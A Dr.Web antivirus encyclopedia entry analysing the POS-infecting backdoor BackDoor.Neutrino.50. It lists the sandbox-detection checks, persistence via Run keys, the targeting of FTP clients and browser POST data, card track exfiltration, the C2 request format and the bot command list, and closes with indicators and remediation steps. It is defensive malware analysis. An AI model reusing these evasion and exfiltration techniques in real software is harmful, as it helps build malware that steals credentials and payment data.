Bibliothèque
Ma bibliothèque

+ Ajouter à la bibliothèque

Contacter-nous !
Support 24/24 | Rules regarding submitting

Nous téléphoner

0 825 300 230

Forum

Vos requêtes

  • Toutes : -
  • Non clôturées : -
  • Dernière : le -

Nous téléphoner

0 825 300 230

Profil

BackDoor.Neutrino.50

Added to the Dr.Web virus database: 2015-05-02

Virus description added:

SHA1 fcf7197bbae81292dc9e444dd9ee1fb6f510cd05 (packed)
a2b801df9bd8438adcf3c08d44bc42e34a83f7d8 (unpacked)

A multicomponent backdoor that can infect POS terminals. It can exploit the CVE-2012-0158 vulnerability to spread.

Once launched, the backdoor checks its environment for the presence of virtual machines as follows:

  1. Using API IsDebuggerPresent, checks for the presence of a debugger
  2. Using API CheckRemoteDebuggerPresent, checks for the presence of a debugger
  3. Checks whether the user name is similar to any of the following ones:
    • MALTEST
    • TEQUILABOOMBOOM
    • SANDBOX
    • VIRUS
    • MALWARE
  4. Converts the file name to lowercase and checks whether it is similar to any of the following ones:
    • SAMPLE
    • VIRUS
    • SANDBOX
  5. Checks for export of "wine_get_unix_file_name" to kernel32.dll
  6. Checks availability of "HKLM\\SOFTWARE\\VMware, Inc.\\VMware Tools"
  7. Compares the value of the "HKLM\\HARDWARE\\DEVICEMAP\\Scsi\\Scsi Port 0\\Scsi Bus 0\\Target Id 0\\Logical Unit Id 0\\Identifier" switch with "VMWARE", "VBOX", "QEMU"
  8. Compares the value of the "HKLM\\HARDWARE\\Description\\System\\SystemBiosVersion" switch with "VBOX", "QEMU", "BOCHS"
  9. Checks availability of "HKLM\\SOFTWARE\\Oracle\\VirtualBox Guest Additions"
  10. Compares the value of the "HKLM\\HARDWARE\\Description\\System\\VideoBiosVersion" switch with "VIRTUALBOX"

If a virtual machine is detected, the Trojan displays the following error message: “An unknown error occurred. Error - (0x[random number])”. After that, BackDoor.Neutrino.50 initiates a self-removal process.

While the Trojan is installed, it creates the "%AppData%\\W2VTWFFiQQ" directory replicating itself there and modifies "Software\\Microsoft\\Windows\\CurrentVersion\\Run" to ensure its autorun. The branch (HKLM/HKCU) is chosen based on the availability of administrator privileges.

As a parameter name, the Trojan chooses a file from the %windir% directory matching one of the following masks:

install*.exe
setup*.exe
update*.exe
patch*.exe

If there is no matching file, the Trojan uses the "svchost.exe" name.

The malware copies the creation date of "explorer.exe" and assigns the file with the “hidden” and “system” attributes.

Then the Trojan initiates a separate thread that monitors the status of the switch responsible for autorun. If the switch is modified or missing, the Trojan adds it again.

Once launched successfully, the backdoor starts gathering information on the infected system, in particular, GUID values ("HKLM\\Software\\Microsoft\\Cryptography\\MachineGuid"), OS version, architecture type, anti-virus software type and version.

Moreover, the Trojan can remove some malicious programs found in the system. For that, it checks all executable files in %APPDATA%, %TEMP%, and %ALLUSERSPROFILE% using the WinVerifyTrust function. If verification returns negative results, and a relevant process is found, the backdoor removes it from autorun modifying "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run"; at that, the branch (HKLM/HKCU) is chosen based on the availability of administrator privileges. After that, the malicious program deletes the file.

Simultaneously, the backdoor counts the number of removed viruses and forwards this data to the command and control server.

Aside from being able to operate on POS terminals, this Trojan can steal information stored by the Microsoft Mail client and account details used to get access to resources from a number of well-known FTP clients over the FTP protocol:

filezilla.exe
ftprush.exe
winscp.exe
coreftp.exe
freeftp.exe
far.exe
ftpte.exe
smartftp.exe
flashfxp.exe
totalcmd.exe

Among running processes, the Trojan looks for the following browser processes:

firefox.exe
chrome.exe
iexplore.exe
opera.exe

intercepting data sending functions (PR_Write, send, WSASend, HttpSendRequestW, and InternetWriteFile). The malware sends the command and control server data from POST requests containing the "ocsp" or "application/ocsp-request" substrings. For Internet Explorer, data from all POST requests is sent.

The "rate" switch of the "HKCU\\Software\\N3NNetwork\\" branch contains the data on time interval between requests sent to the server. The backdoor reads this value and multiplies it by 60 seconds. The result cannot exceed 1 hour.

Data is sent as a "cmd=1&uid=%s&os=%s&av=%s&version=%s&quality=%i" string, where uid indicates the infected computer GUID, os indicates data on the OS, av indicates the installed anti-virus, version is the version of the backdoor, quality stands for the number of detected viruses.

The command and control server list is hard-coded in the Trojan's body. It is implemented as a UNICODE string encrypted with base64. The string can contain several server addresses separated by '*'. During initialization, the backdoor checks all the servers until it finds one that replies to a PING request.

Server reply to a PING request can look as follows:

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><HTML>
<HEAD><TITLE>404 Not Found</TITLE></HEAD><BODY><H1>Not Found</H1>
The requested URL /ionocube_/tasks.php was not found on this server.</BODY></HTML>
<!-- DEBUGcG9uZw==DEBUG -->

From the reply, the backdoor retrieves the payload contained between the "DEBUG" and "DEBUG" strings encrypted with base64.

The Trojan extracts the command and control server address from the registry, decrypts it, and generates a request as follows:

"POST <!target> HTTP/1.0\r\n"
                    "Host: \r\n"
                    "User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:35.0) Gecko/20100101
Firefox/35.0\r\n" "Content-type: application/x-www-form-urlencoded\r\n" "Cookie: authkeys=21232f297a57a5a743894a0e4a801fc3\r\n" "Content-length: <!len>\r\n" "\r\n" "<!payload>\n",

where the target and host values are retrieved from the address of the server to which data should be forwarded, len indicates the payload length, payload indicates the string encrypted with base64.

Bank card information is sent in the following package:

d=1&type=%s&data=%s

where type indicates the "Track1" or "Track2" strings and data indicates the information extracted from the process memory.

The backdoor can execute the following commands:

cmdCommand
botkillerRemove other malicious programs
cmdForward the command to the command interpreter (cmd.exe)
dwfloodFlood a remote host with requests to download a file (file is downloaded, deleted, and downloaded once again)
findfileFind and upload the specified file to the remote server
httpSend a GET or a POST request
httpsLaunch an HTTPS Flood attack
infectInfect computers on a LAN and removable media
keyloggerRun keylogger (logs clipboard history and key strokes and takes screenshots upon pressing the mouse button)
loaderDownload a .dll file and run it using the regsvr32 tool
rateSet the time interval between requests to the server
slowSend a POST request bearing the "X-a: b\r\n" payload
tcpLaunch a TCP Flood attack
udpLaunch a UDP Flood attack
updateUpdate itself (update is downloaded at the link from the command)

The backdoor can be detected in the system as follows:

Mutex—"W2VTWFFiQQ"
Directory—"%AppData%\\W2VTWFFiQQ"
Presence of the "HKCU\\Software\\N3NNetwork\\" branch

Recommandations pour le traitement

  1. Si le système d'exploitation peut être démarré (en mode normal ou en mode sans échec), téléchargez Dr.Web Security Space et lancez un scan complet de votre ordinateur et de tous les supports amovibles que vous utilisez. En savoir plus sur Dr.Web Security Space.
  2. Si le démarrage du système d'exploitation est impossible, veuillez modifier les paramètres du BIOS de votre ordinateur pour démarrer votre ordinateur via CD/DVD ou clé USB. Téléchargez l'image du disque de secours de restauration du système Dr.Web® LiveDisk ou l'utilitaire pour enregistrer Dr.Web® LiveDisk sur une clé USB, puis préparez la clé USB appropriée. Démarrez l'ordinateur à l'aide de cette clé et lancez le scan complet et le traitement des menaces détectées.

Veuillez lancer le scan complet du système à l'aide de Dr.Web Antivirus pour Mac OS.

Veuillez lancer le scan complet de toutes les partitions du disque à l'aide de Dr.Web Antivirus pour Linux.

  1. Si votre appareil mobile fonctionne correctement, veuillez télécharger et installer sur votre appareil mobile Dr.Web pour Android. Lancez un scan complet et suivez les recommandations sur la neutralisation des menaces détectées.
  2. Si l'appareil mobile est bloqué par le Trojan de la famille Android.Locker (un message sur la violation grave de la loi ou la demande d'une rançon est affiché sur l'écran de l'appareil mobile), procédez comme suit:
    • démarrez votre Smartphone ou votre tablette en mode sans échec (si vous ne savez pas comment faire, consultez la documentation de l'appareil mobile ou contactez le fabricant) ;
    • puis téléchargez et installez sur votre appareil mobile Dr.Web pour Android et lancez un scan complet puis suivez les recommandations sur la neutralisation des menaces détectées ;
    • Débranchez votre appareil et rebranchez-le.

En savoir plus sur Dr.Web pour Android